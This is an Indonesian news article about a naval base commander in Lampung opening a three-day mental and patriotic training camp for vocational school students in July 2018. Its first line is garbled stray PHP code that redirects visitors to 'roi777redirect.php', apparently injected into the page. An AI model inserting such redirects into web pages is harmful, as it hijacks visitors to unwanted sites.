header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Danlanal Lampung, Buka Mada Bintal SMK SMTI di Pantai Klara -
Danlanal Lampung, Buka Mada Bintal SMK SMTI di Pantai Klara

TRANSLAMPUNG.COM, LAMPUNG – Komandan pangkalan TNI Angkatan Laut Lampung, Kolonel Laut (P) A. Agung P. S. membuka pelatihan bintal juang siswa SMK SMTI Bandar Lampung, di Bumi Perkemahan dan Latihan TNI-AL Pantai Klara, Padang Cermin Pesawaran, Kamis (12/07/18)

Kegiatan yang dilaksanakan oleh Lanal Lampung bekerja sama dengan Dinas Pendidikan rencananya berlangsung selama tiga hari, dari tanggal 12 – 15 Juli 2018 dengan diikuti oleh 314 siswa/siswi dengan instruktur para pelatih dari Lanal didampingi 18 orang guru dan 18 senior.

Kegiatan dengan tujuan untuk membina dan menumbuh kembangkan jiwa dan kecintaan terhadap tanah air sesuai dengan nilai-nilai Pancasila serta meningkatkan rasa persatuan dan menambah wawasan serta kedisiplinan bagi para peserta.

Dalam amanatnya Danlanal Lampung menyampaikan, ” Pembinaan generasi muda adalah tanggung jawab komponen bangsa, kita sadari bersama bahwa dalam pembangunan Nasional adalah pembinaan dan pembangunan mental generasi muda sebagai penerus bangsa.

Kegiatan pembinaan mental dan kunjungan yang akan dilaksanakan ini merupakan kegiatan yang positif dan dapat dirasakan manfaatnya, tidak hanya bagi peserta namun juga bermanfaat bagi orang tua dan sekolah.

Beliau juga berpesan selama dalam pelatihan jaga kondisi kesehatan agar semua kegiatan dapat diikuti dengan baik, jaga kekompakan dan kebersamaan diantara peserta, jaga perilaku dan sikap serta utamakan keselamatan personel maupun mental.

Turut hadir dalam acara pembukaan tersebut, Kepala Sekolah SMK SMTI Bandar Lampung, Ibu Sulastri dan Perwira Staf Lanal Lampung.
(*)

News Reporter